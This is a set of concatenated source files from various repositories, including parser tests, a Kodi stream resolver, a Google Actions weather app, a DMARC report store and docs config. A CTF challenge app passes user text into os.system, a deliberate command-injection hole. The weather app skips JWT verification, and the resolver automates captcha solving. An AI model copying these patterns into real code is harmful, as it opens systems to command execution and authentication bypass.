fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300' and datatree.get_value('CLM01') == '5555':
self.loop2300 = datatree
break
def test_repeat_2400(self):
ct = 0
for loop_2400 in self.loop2300.select('2400'):
ct += 1
self.assertEqual(
ct, 3, 'Found %i 2400 loops. Should have %i' % (ct, 3))
def test_repeat_2430(self):
ct = 0
for loop_2430 in self.loop2300.select('2400/2430'):
ct += 1
self.assertEqual(
ct, 0, 'Found %i 2430 loops. Should have %i' % (ct, 0))
class IterateTree(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
def test_iterate_all(self):
ct_2000a = 0
ct_other = 0
for datatree in self.src.iter_segments('2000A'):
if datatree.id == '2000A':
ct_2000a += 1
else:
ct_other += 1
self.assertEqual(ct_2000a, 1,
'Found %i 2000A loops. Should have %i' % (ct_2000a, 1))
self.assertEqual(ct_other, 11, 'Found %i external segments. Should have %i' % (ct_other, 11))
class TreeDeleteSegment(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_delete(self):
assert self.loop2300.get_value('CN101') == '05'
seg_data = pyx12.segment.Segment('CN1*05~', '~', '*', ':')
self.assertTrue(self.loop2300.delete_segment(seg_data))
self.assertEqual(self.loop2300.get_value('CN101'), None)
def test_delete_fail(self):
seg_data = pyx12.segment.Segment('HCP*00*7.11~', '~', '*', ':')
self.assertFalse(self.loop2300.delete_segment(seg_data))
class TreeDeleteLoop(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_delete(self):
self.assertEqual(self.loop2300.get_value('2400/LX01'), '1')
self.assertTrue(self.loop2300.delete_node('2400'))
self.assertEqual(self.loop2300.get_value('2400/LX01'), '2')
def test_delete_fail(self):
self.assertFalse(self.loop2300.delete_node('2500'))
class NodeDeleteSelf(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_delete(self):
cn1 = self.loop2300.first('CN1')
assert cn1.id == 'CN1'
cn1.delete()
try:
a = cn1.id
except EngineError:
pass
except:
a = cn1.id
#self.assertRaises(EngineError, cn1.id)
class TreeCopy(X12fileTestCase):
def setUp(self):
self.param = pyx12.params.params()
def test_add_node(self):
fd = self._makeFd(datafiles['835id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2100'):
if datatree.id == '2100':
for svc in datatree.select('2110'):
new_svc = svc.copy()
new_svc.set_value('SVC01', 'XX:AAAAA')
self.assertTrue(not svc is new_svc)
datatree.add_node(new_svc)
#for svc in datatree.select('2110'):
# print svc.get_value('SVC01')
break
def test_copy_seg(self):
fd = self._makeFd(datafiles['835id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2100'):
if datatree.id == '2100':
for svc in datatree.select('2110'):
new_svc = svc.copy()
self.assertFalse(svc is new_svc)
self.assertEqual(svc.get_value('SVC01'),
new_svc.get_value('SVC01'))
new_svc.set_value('SVC01', 'XX:AAAAA')
self.assertFalse(svc is new_svc)
self.assertNotEqual(svc.get_value('SVC01'),
new_svc.get_value('SVC01'))
break
| 2.421875 | 2 |
repo/script.module.liveresolver/lib/liveresolver/resolvers/finecast.py | Hades01/Addons | 3 | 6881 | <reponame>Hades01/Addons<filename>repo/script.module.liveresolver/lib/liveresolver/resolvers/finecast.py<gh_stars>1-10
# -*- coding: utf-8 -*-
import re,urlparse,cookielib,os,urllib
from liveresolver.modules import client,recaptcha_v2,control,constants, decryptionUtils
from liveresolver.modules.log_utils import log
cookieFile = os.path.join(control.dataPath, 'finecastcookie.lwp')
def resolve(url):
#try:
try:
referer = urlparse.parse_qs(urlparse.urlparse(url).query)['referer'][0]
except:
referer=url
id = urlparse.parse_qs(urlparse.urlparse(url).query)['u'][0]
cj = get_cj()
url = 'http://www.finecast.tv/embed4.php?u=%s&vw=640&vh=450'%id
rs = client.request(url,referer=referer,cj=cj)
sitekey = re.findall('data-sitekey="([^"]+)', rs)[0]
token = recaptcha_v2.UnCaptchaReCaptcha().processCaptcha(sitekey, lang='de')
#1:04
    result = client.request(url, post=urllib.urlencode(token), referer=referer)
log(result)
file = re.findall('[\'\"](.+?.stream)[\'\"]',result)[0]
auth = re.findall('[\'\"](\?wmsAuthSign.+?)[\'\"]',result)[0]
rtmp = 'http://play.finecast.tv:1935/live/%s/playlist.m3u8%s'%(file,auth)
return rtmp
#except:
# return
def get_cj():
cookieJar=None
try:
cookieJar = cookielib.LWPCookieJar()
cookieJar.load(cookieFile,ignore_discard=True)
except:
cookieJar=None
if not cookieJar:
cookieJar = cookielib.LWPCookieJar()
return cookieJar | 1.984375 | 2 |
src/robotide/publish/__init__.py | crylearner/RIDE3X | 1 | 6882 | <filename>src/robotide/publish/__init__.py<gh_stars>1-10
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Message publishing and subscribing.
.. contents::
:depth: 2
:local:
Introduction
------------
RIDE uses messages for communication when something of interest happens, for
example a suite is loaded or an item is selected in the tree. This module provides
means both for subscribing to listen to those messages and for sending them.
Messages are used for communication between the different components of the
core application, but their main usage is notifying plugins about various events.
Plugins can also send messages themselves, and also create custom messages, if
they have a need.
Subscribing
-----------
The core application uses the global `PUBLISHER` object (an instance of the
`Publisher` class) for subscribing to and unsubscribing from the messages.
Plugins should use the helper methods of the `Plugin` class instead of using
the `PUBLISHER` directly.
Message topics
~~~~~~~~~~~~~~
Regardless of the method, subscribing to messages requires a message topic.
Topics can be specified using the actual message classes in
`robotide.publish.messages` module or with their dot separated topic strings.
It is, for example, equivalent to use the `RideTreeSelection` class and a
string ``ride.tree.selection``. Topic strings can normally, but not always, be
mapped directly to the class names.
The topic strings represent a hierarchy where the dots separate the hierarchy
levels. All messages with a topic at or below the given level will match the
subscribed topic. For example, subscribing to the ``ride.notebook`` topic means
that `RideNotebookTabChanged` or any other message with a topic starting with
``ride.notebook`` will match.
Listeners
~~~~~~~~~
Another thing needed when subscribing is a listener, which must be a callable
accepting one argument. When the corresponding message is published, the listener
will be called with an instance of the message class as an argument. That instance
contains the topic and possibly some additional information in its attributes.
The following example demonstrates how a plugin can subscribe to an event.
In this example the ``OnTreeSelection`` method is the listener and the
``message`` it receives is an instance of the `RideTreeSelection` class.
::
from robotide.pluginapi import Plugin, RideTreeSelection
class MyFancyPlugin(Plugin):
def activate(self):
self.subscribe(self.OnTreeSelection, RideTreeSelection)
def OnTreeSelection(self, message):
print message.topic, message.node
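
Because topics can also be given as dot separated strings, the same
subscription can be made without importing the message class. This is a
minimal sketch relying on the class/topic-string equivalence described above::

    self.subscribe(self.OnTreeSelection, 'ride.tree.selection')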
Unsubscribing
~~~~~~~~~~~~~
Unsubscribing from a single message requires passing the same topic and listener
to the unsubscribe method that were used for subscribing. Additionally both
the `PUBLISHER` object and the `Plugin` class provide a method for unsubscribing
all listeners registered by someone.
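
For example, the plugin above could stop listening to tree selections by
mirroring its subscribe call. This is a sketch; the listener and topic must
be exactly the ones that were used when subscribing::

    self.unsubscribe(self.OnTreeSelection, RideTreeSelection)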
Publishing messages
-------------------
Both the core application and plugins can publish messages using message
classes in the `publish.messages` module directly. Sending a message is as easy
as creating an instance of the class and calling its ``publish`` method. What
parameters are needed when the instance is created depends on the message.
Custom messages
~~~~~~~~~~~~~~~
Most of the messages in the `publish.messages` module are to be sent only by
the core application. If plugins need their own messages, for example for
communication between different plugins, they can easily create custom messages
by extending the `RideMessage` base class::
from robotide.pluginapi import Plugin, RideMessage
class FancyImportantMessage(RideMessage):
data = ['importance']
class MyFancyPlugin(Plugin):
def important_action(self):
# some code ...
            FancyImportantMessage(importance='HIGH').publish()
Plugins interested in this message can subscribe to it using either
the class ``FancyImportantMessage`` or its automatically generated topic
``fancy.important``. Notice that all the messages are also exposed through
the `robotide.pluginapi` module and plugins should import them from there.
"""
import os
from robotide.context import WX_VERSION
if WX_VERSION > '3.0':
from wx.lib.pubsub import setuparg1
elif WX_VERSION > '2.9':
from wx.lib.pubsub import setupv1
from .messages import *
from .publisher import PUBLISHER
def get_html_message(name):
return open(os.path.join(
os.path.dirname(__file__), 'html', '{}.html'.format(name))).read()
| 1.984375 | 2 |
app.py | pizzapanther/google-actions-python-example | 9 | 6883 | #!/usr/bin/env python
import os
import json
import tornado.ioloop
import tornado.log
import tornado.web
from google.oauth2 import id_token
from google.auth.transport import requests as google_requests
import jwt
import requests
API_KEY = os.environ.get('OPEN_WEATHER_MAP_KEY', None)
PROJECT_ID = os.environ.get('PROJECT_ID', None)
class WeatherHandler(tornado.web.RequestHandler):
def start_conversation (self):
response = {
'expectUserResponse': True,
'expectedInputs': [
{
'possibleIntents': {'intent': 'actions.intent.TEXT'},
'inputPrompt': {
'richInitialPrompt': {
'items': [
{
'simpleResponse': {
'ssml': '<speak>What city would you like the weather for?</speak>'
}
}
]
}
}
}
]
}
self.set_header("Content-Type", 'application/json')
self.set_header('Google-Assistant-API-Version', 'v2')
self.write(json.dumps(response, indent=2))
def get_weather (self, city):
api_response = requests.get(
'http://api.openweathermap.org/data/2.5/weather',
params={'q': city, 'APPID': API_KEY}
)
data = api_response.json()
if 'main' not in data:
response = {
'expectUserResponse': False,
'finalResponse': {
'richResponse': {
'items': [
{
'simpleResponse': {
'ssml': '<speak>City not found - meow!</speak>'
}
}
]
}
}
}
else:
temp = round(1.8 * (data['main']['temp'] - 273) + 32)
response = {
'expectUserResponse': False,
'finalResponse': {
'richResponse': {
'items': [
{
'simpleResponse': {
'ssml': '<speak>The temperature in {} is {} degrees.</speak>'.format(city, temp)
}
}
]
}
}
}
self.set_header("Content-Type", 'application/json')
self.set_header('Google-Assistant-API-Version', 'v2')
self.write(json.dumps(response, indent=2))
def get (self):
city = self.get_query_argument('city', '')
if city:
self.get_weather(city)
else:
self.start_conversation()
def post (self):
token = self.request.headers.get("Authorization")
jwt_data = jwt.decode(token, verify=False)
if jwt_data['aud'] != PROJECT_ID:
self.set_status(401)
self.write('Token Mismatch')
else:
request = google_requests.Request()
try:
# Makes external request, remove if not needed to speed things up
id_info = id_token.verify_oauth2_token(token, request, PROJECT_ID)
except:
self.set_status(401)
self.write('Token Mismatch')
data = json.loads(self.request.body.decode('utf-8'))
intent = data['inputs'][0]['intent']
print(intent)
print(data['conversation']['conversationId'])
if intent == 'actions.intent.MAIN':
self.start_conversation()
else:
city = data['inputs'][0]['arguments'][0]['textValue']
self.get_weather(city)
def make_app():
return tornado.web.Application([
(r"/weather-app", WeatherHandler),
], autoreload=True)
if __name__ == "__main__":
tornado.log.enable_pretty_logging()
app = make_app()
app.listen(int(os.environ.get('PORT', '8000')))
tornado.ioloop.IOLoop.current().start()
| 2.5 | 2 |
ProsperFlask/{{cookiecutter.project_name}}/tests/conftest.py | EVEprosper/ProsperCookiecutters | 0 | 6884 | <filename>ProsperFlask/{{cookiecutter.project_name}}/tests/conftest.py
# AUTOGENERATED BY: ProsperCookiecutters/ProsperFlask
# TEMPLATE VERSION: {{cookiecutter.template_version}}
# AUTHOR: {{cookiecutter.author_name}}
"""PyTest fixtures and modifiers"""
import pytest
from {{cookiecutter.library_name}}.endpoints import APP
@pytest.fixture
def app():
"""flask test hook for dry-running Flask code"""
return APP
| 1.445313 | 1 |
zoloto/coords.py | RealOrangeOne/yuri | 7 | 6885 | from typing import Iterator, NamedTuple, Tuple
from cached_property import cached_property
from cv2 import Rodrigues
from pyquaternion import Quaternion
class Coordinates(NamedTuple):
"""
:param float x: X coordinate
:param float y: Y coordinate
"""
x: float
y: float
class ThreeDCoordinates(NamedTuple):
"""
:param float x: X coordinate
:param float y: Y coordinate
:param float z: Z coordinate
"""
x: float
y: float
z: float
class Spherical(NamedTuple):
"""
:param float rot_x: Rotation around the X-axis, in radians
:param float rot_y: Rotation around the Y-axis, in radians
:param float dist: Distance
"""
rot_x: float
rot_y: float
dist: int
ThreeTuple = Tuple[float, float, float]
RotationMatrix = Tuple[ThreeTuple, ThreeTuple, ThreeTuple]
class Orientation:
"""The orientation of an object in 3-D space."""
def __init__(self, e_x: float, e_y: float, e_z: float):
"""
Construct a quaternion given the components of a rotation vector.
More information: https://w.wiki/Fci
"""
rotation_matrix, _ = Rodrigues((e_x, e_y, e_z))
self._quaternion = Quaternion(matrix=rotation_matrix)
@property
def rot_x(self) -> float:
"""Get rotation angle around x axis in radians."""
return self.roll
@property
def rot_y(self) -> float:
"""Get rotation angle around y axis in radians."""
return self.pitch
@property
def rot_z(self) -> float:
"""Get rotation angle around z axis in radians."""
return self.yaw
@property
def yaw(self) -> float:
"""Get rotation angle around z axis in radians."""
return self.yaw_pitch_roll[0]
@property
def pitch(self) -> float:
"""Get rotation angle around y axis in radians."""
return self.yaw_pitch_roll[1]
@property
def roll(self) -> float:
"""Get rotation angle around x axis in radians."""
return self.yaw_pitch_roll[2]
@cached_property
def yaw_pitch_roll(self) -> ThreeTuple:
"""
Get the equivalent yaw-pitch-roll angles.
Specifically intrinsic Tait-Bryan angles following the z-y'-x'' convention.
"""
return self._quaternion.yaw_pitch_roll
def __iter__(self) -> Iterator[float]:
"""
Get an iterator over the rotation angles.
Returns:
An iterator of floating point angles in order x, y, z.
"""
return iter([self.rot_x, self.rot_y, self.rot_z])
@cached_property
def rotation_matrix(self) -> RotationMatrix:
"""
Get the rotation matrix represented by this orientation.
Returns:
A 3x3 rotation matrix as a tuple of tuples.
"""
r_m = self._quaternion.rotation_matrix
return (
(r_m[0][0], r_m[0][1], r_m[0][2]),
(r_m[1][0], r_m[1][1], r_m[1][2]),
(r_m[2][0], r_m[2][1], r_m[2][2]),
)
@property
def quaternion(self) -> Quaternion:
"""Get the quaternion represented by this orientation."""
return self._quaternion
def __repr__(self) -> str:
return "Orientation(rot_x={},rot_y={},rot_z={})".format(
self.rot_x, self.rot_y, self.rot_z
)
| 3.390625 | 3 |
azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/bms_container_query_object.py | JonathanGailliez/azure-sdk-for-python | 1 | 6886 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class BMSContainerQueryObject(Model):
"""The query filters that can be used with the list containers API.
All required parameters must be populated in order to send to Azure.
:param backup_management_type: Required. Backup management type for this
container. Possible values include: 'Invalid', 'AzureIaasVM', 'MAB',
'DPM', 'AzureBackupServer', 'AzureSql', 'AzureStorage', 'AzureWorkload',
'DefaultBackup'
:type backup_management_type: str or
~azure.mgmt.recoveryservicesbackup.models.BackupManagementType
:param container_type: Type of container for filter. Possible values
include: 'Invalid', 'Unknown', 'IaasVMContainer',
'IaasVMServiceContainer', 'DPMContainer', 'AzureBackupServerContainer',
'MABContainer', 'Cluster', 'AzureSqlContainer', 'Windows', 'VCenter',
'VMAppContainer', 'SQLAGWorkLoadContainer', 'StorageContainer',
'GenericContainer', 'SqlCluster', 'ExchangeDAG', 'SharepointFarm',
'HyperVCluster', 'WindowsClient'
:type container_type: str or
~azure.mgmt.recoveryservicesbackup.models.ContainerType
:param backup_engine_name: Backup engine name
:type backup_engine_name: str
:param fabric_name: Fabric name for filter
:type fabric_name: str
:param status: Status of registration of this container with the Recovery
Services Vault.
:type status: str
:param friendly_name: Friendly name of this container.
:type friendly_name: str
"""
_validation = {
'backup_management_type': {'required': True},
}
_attribute_map = {
'backup_management_type': {'key': 'backupManagementType', 'type': 'str'},
'container_type': {'key': 'containerType', 'type': 'str'},
'backup_engine_name': {'key': 'backupEngineName', 'type': 'str'},
'fabric_name': {'key': 'fabricName', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
}
def __init__(self, **kwargs):
super(BMSContainerQueryObject, self).__init__(**kwargs)
self.backup_management_type = kwargs.get('backup_management_type', None)
self.container_type = kwargs.get('container_type', None)
self.backup_engine_name = kwargs.get('backup_engine_name', None)
self.fabric_name = kwargs.get('fabric_name', None)
self.status = kwargs.get('status', None)
self.friendly_name = kwargs.get('friendly_name', None)
| 1.703125 | 2 |
ia870/iagradm.py | rdenadai/ia870p3 | 5 | 6887 | <filename>ia870/iagradm.py<gh_stars>1-10
# -*- encoding: utf-8 -*-
# Module iagradm
def iagradm(f, Bdil=None, Bero=None):
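    # Morphological gradient: dilation of f by Bdil minus erosion of f by Bero.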
from ia870 import iasubm,iadil,iaero,iasecross
if Bdil is None: Bdil = iasecross()
if Bero is None: Bero = iasecross()
y = iasubm( iadil(f,Bdil),iaero(f,Bero))
return y
| 2.421875 | 2 |
backend/api/tests/test_models/test_utils/test_ranking_suffixes.py | ChristchurchCityWeightlifting/lifter-api | 0 | 6888 | <filename>backend/api/tests/test_models/test_utils/test_ranking_suffixes.py
import pytest
from api.models.utils import rankings
@pytest.fixture
def test_data():
return [1, 11, 101]
def test_rankings(test_data):
"""Tests if ranking works
e.g. 1 returns 1st
11 returns 11th
101 return 101st
"""
assert rankings(test_data[0]) == "1st"
assert rankings(test_data[1]) == "11th"
assert rankings(test_data[2]) == "101st"
| 2.640625 | 3 |
web/web-lemonthinker/src/app/app.py | NoXLaw/RaRCTF2021-Challenges-Public | 2 | 6889 | <filename>web/web-lemonthinker/src/app/app.py
from flask import Flask, request, redirect, url_for
import os
import random
import string
import time # lemonthink
clean = time.time()
app = Flask(__name__)
chars = list(string.ascii_letters + string.digits)
@app.route('/')
def main():
return open("index.html").read()
@app.route('/generate', methods=['POST'])
def upload():
global clean
if time.time() - clean > 60:
os.system("rm static/images/*")
clean = time.time()
text = request.form.getlist('text')[0]
text = text.replace("\"", "")
filename = "".join(random.choices(chars,k=8)) + ".png"
os.system(f"python3 generate.py {filename} \"{text}\"")
return redirect(url_for('static', filename='images/' + filename), code=301) | 2.53125 | 3 |
aprendizado/codewars/descending_order.py | renatodev95/Python | 0 | 6890 | # Your task is to make a function that can take any non-negative integer as an argument and return it with its digits in descending order. Essentially, rearrange the digits to create the highest possible number.
# Function that takes a (non-negative) integer as an argument and returns it with its digits in descending order. Essentially, rearrange the digits to create the highest possible number.
# First version
def descending_order(num):
new_num = str(num)
new_num1 = [int(x) for x in new_num]
new_num1 = sorted(new_num1, reverse=True)
string = ''
for x in new_num1:
string += str(x)
return int(string)
# Refactoring of the first version (using a list comprehension)
def descending_order_two(num):
return int(''.join([x for x in sorted(str(num), reverse=True)]))
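# Illustrative self-check added for clarity (not part of the original kata solution;
# both implementations should agree on the same inputs):
if __name__ == '__main__':
    assert descending_order(42145) == 54421
    assert descending_order_two(42145) == 54421
    assert descending_order(0) == 0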
| 4.28125 | 4 |
dmarc_storage.py | Schramp/dmarc-monitoring | 1 | 6891 | import sqlite3
import os
import datetime
__all__ = ['DMARCStorage', 'totimestamp']
def totimestamp(datetime_object):
if datetime_object.utcoffset() is not None:
utc_naive = datetime_object.replace(tzinfo=None) - datetime_object.utcoffset()
else:
utc_naive = datetime_object
return (utc_naive - datetime.datetime(1970, 1, 1)).total_seconds()
class DMARCStorage(object):
def __init__(self, database_filename='dmarc.sqlite', database_directory="./results"):
# Create or connect to the database:
database_path = os.path.join(database_directory, database_filename)
if not os.path.exists(database_directory):
os.makedirs(database_directory)
self._conn = sqlite3.connect(database_path)
# Set automcommit to true and initialise cursor:
self._conn.isolation_level = None
self._cur = self._conn.cursor()
# Create the tables if they don't exist already:
self._init_database()
def __del__(self):
if self._conn is not None:
self._close_connection()
def _init_database(self):
self._cur.execute("PRAGMA foreign_keys = ON;")
self._cur.execute("""CREATE TABLE IF NOT EXISTS dmarc_reports (
report_id TEXT PRIMARY KEY,
receiver TEXT,
report_filename TEXT,
report_start INTEGER,
report_end INTEGER
);""")
self._cur.execute("""CREATE TABLE IF NOT EXISTS dmarc_records (
report_id TEXT REFERENCES dmarc_reports(report_id) ON DELETE CASCADE,
record_id INTEGER,
ip_address TEXT,
hostname TEXT,
disposition TEXT,
reason TEXT,
spf_pass INTEGER,
dkim_pass INTEGER,
header_from TEXT,
envelope_from TEXT,
count INTEGER,
PRIMARY KEY (report_id, record_id)
);""")
self._cur.execute("""CREATE TABLE IF NOT EXISTS spf_results (
report_id TEXT,
record_id INTEGER,
spf_id INTEGER,
domain TEXT,
result TEXT,
PRIMARY KEY (report_id, record_id, spf_id),
FOREIGN KEY (report_id, record_id)
REFERENCES dmarc_records(report_id, record_id)
ON DELETE CASCADE
);""")
self._cur.execute("""CREATE TABLE IF NOT EXISTS dkim_signatures (
report_id TEXT,
record_id INTEGER,
signature_id INTEGER,
domain TEXT,
result TEXT,
selector TEXT,
PRIMARY KEY (report_id, record_id, signature_id),
FOREIGN KEY (report_id, record_id)
REFERENCES dmarc_records(report_id, record_id)
ON DELETE CASCADE,
CONSTRAINT unique_dkim_sig
UNIQUE (report_id, record_id, domain, result, selector)
);""")
def _delete_all_data(self):
# Drop the tables in the right order:
self._cur.execute("DROP TABLE dkim_signatures;")
self._cur.execute("DROP TABLE spf_results;")
self._cur.execute("DROP TABLE dmarc_records;")
self._cur.execute("DROP TABLE dmarc_reports;")
# Recreate them again, empty:
self._init_database()
def _close_connection(self):
self._conn.close()
self._conn = None
def report_already_exists(self, report_filename):
# Check if a report with that filename already exists:
self._cur.execute("SELECT report_filename FROM dmarc_reports WHERE report_filename=?;", (report_filename,))
already_exists = self._cur.fetchone() is not None
return already_exists
def save_new_report(self, report):
# Persist the report itself:
self._cur.execute("INSERT INTO dmarc_reports VALUES (?,?,?,?,?);",
[report.id, report.receiver, report.filename,
totimestamp(report.start_date), totimestamp(report.end_date)])
# Persist each record of that report with a generated ID:
for rec_id, rec in enumerate(report.records):
self._cur.execute("INSERT INTO dmarc_records VALUES (?,?,?,?,?,?,?,?,?,?,?);",
[report.id, rec_id, rec.ip, rec.host, rec.disposition, rec.reason,
rec.spf_pass, rec.dkim_pass, rec.header_from, rec.envelope_from,
rec.count])
# Persist the SPF data:
for spf_id, spf_result in enumerate(rec.spf_results):
self._cur.execute("INSERT INTO spf_results VALUES (?,?,?,?,?);",
[report.id, rec_id, spf_id, spf_result["domain"], spf_result["result"]])
# Persist all the DKIM signatures with generated IDs
for sig_id, sig in enumerate(rec.dkim_signatures):
self._cur.execute("INSERT INTO dkim_signatures VALUES (?,?,?,?,?,?);",
[report.id, rec_id, sig_id, sig["domain"], sig["result"], sig["selector"]])
def get_reporting_start_date(self):
self._cur.execute("SELECT min(report_start) FROM dmarc_reports;")
return datetime.datetime.utcfromtimestamp(self._cur.fetchone()[0])
def get_reporting_end_date(self):
self._cur.execute("SELECT max(report_start) FROM dmarc_reports;")
return datetime.datetime.utcfromtimestamp(self._cur.fetchone()[0])
def get_number_reports(self):
self._cur.execute("SELECT count(*) FROM dmarc_reports;")
return self._cur.fetchone()[0]
def get_count_by_disposition(self):
self._cur.execute("SELECT disposition, sum(count) FROM dmarc_records GROUP BY disposition;")
return {str(r[0]): r[1] for r in self._cur.fetchall()}
def get_count_by_hostnames(self):
self._cur.execute("SELECT hostname, ip_address, sum(count) FROM dmarc_records GROUP BY hostname, ip_address;")
return {str(r[0]) if r[0] is not None else str(r[1]): r[2] for r in self._cur.fetchall()}
def get_count_by_receiver(self):
self._cur.execute("SELECT receiver, sum(count) FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id GROUP BY receiver;")
return {str(r[0]): r[1] for r in self._cur.fetchall()}
def get_count_by_dkim_domain(self):
self._cur.execute("SELECT domain, sum(count) FROM dmarc_records JOIN dkim_signatures " +
"ON dmarc_records.report_id=dkim_signatures.report_id AND " +
"dmarc_records.record_id=dkim_signatures.record_id GROUP BY domain;")
return {str(r[0]): r[1] for r in self._cur.fetchall()}
def get_count_by_status_string(self):
self._cur.execute("SELECT spf_pass, dkim_pass, sum(count) FROM dmarc_records GROUP BY spf_pass, dkim_pass;")
status = {1: "pass", 0: "fail", None: "n/a"}
return {"SPF:%s, DKIM:%s" % (status[r[0]], status[r[1]]): r[2] for r in self._cur.fetchall()}
def get_raw_spf_status_count_by_timestamp(self):
self._cur.execute("SELECT report_start, spf_pass, count FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id;")
return self._cur.fetchall()
def get_raw_dkim_status_count_by_timestamp(self):
self._cur.execute("SELECT report_start, dkim_pass, count FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id;")
return self._cur.fetchall()
def get_raw_dmarc_status_count_by_timestamp(self):
self._cur.execute("SELECT report_start, spf_pass + dkim_pass, count " +
"FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id;")
return self._cur.fetchall()
def execute_query(self, sql, values=None):
if values is not None:
self._cur.execute(sql, values)
else:
self._cur.execute(sql)
return self._cur.fetchall()
| 2.546875 | 3 |
setup.py | mcdruid/sumologic-python-sdk | 4 | 6892 | from setuptools import setup, find_packages
setup(
name="sumologic-sdk",
version="0.1.9",
packages=find_packages(),
install_requires=['requests>=2.2.1'],
# PyPI metadata
author="<NAME>, <NAME>",
author_email="<EMAIL>, <EMAIL>",
description="Sumo Logic Python SDK",
license="PSF",
keywords="sumologic python sdk rest api log management analytics logreduce splunk security siem collector forwarder",
url="https://github.com/SumoLogic/sumologic-python-sdk",
zip_safe=True
)
| 1.210938 | 1 |
docs/conf.py | urm8/django-translations | 100 | 6893 | <reponame>urm8/django-translations
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
import json
import datetime
# `Django setup` below, will add the path to `translations` module
# automatically because it's been included in `project.settings`, so no need
# to import it here
# -- Django setup ------------------------------------------------------------
# generated project settings
import django
sys.path.insert(
0,
os.path.join(os.path.dirname(os.path.abspath('.')), 'project')
)
os.environ['DJANGO_SETTINGS_MODULE'] = 'project.settings'
django.setup()
# -- Project information -----------------------------------------------------
with open(
os.path.join(
os.path.dirname(os.path.abspath('.')),
'config.json'
), 'r') as fh:
info = json.load(fh)
# project
project = info['project']['name']
# description
description = info['project']['desc']
# author
author = info['author']['name']
# The short X.Y version
version = info['release']['version']
# The full version, including alpha/beta/rc tags
release = info['release']['name']
# github
github_user = info['github']['user']
github_repo = info['github']['repo']
# donation
donate_url = info['urls']['funding']
# logo
logo = info['project']['logo']
# documentation
documentation = '{} {}'.format(project, 'Documentation')
# year
year = datetime.datetime.now().year
# copyright
copyright = '{year}, {author}'.format(year=year, author=author)
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'monokai'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
'note_bg': '#fec',
'note_border': '#ffe2a8',
'show_relbars': True,
'logo': logo,
'touch_icon': logo,
'logo_name': True,
'description': description,
'github_user': github_user,
'github_repo': github_repo,
'github_banner': True,
}
# Add any paths that contain custom static files (such as style sheets) here,
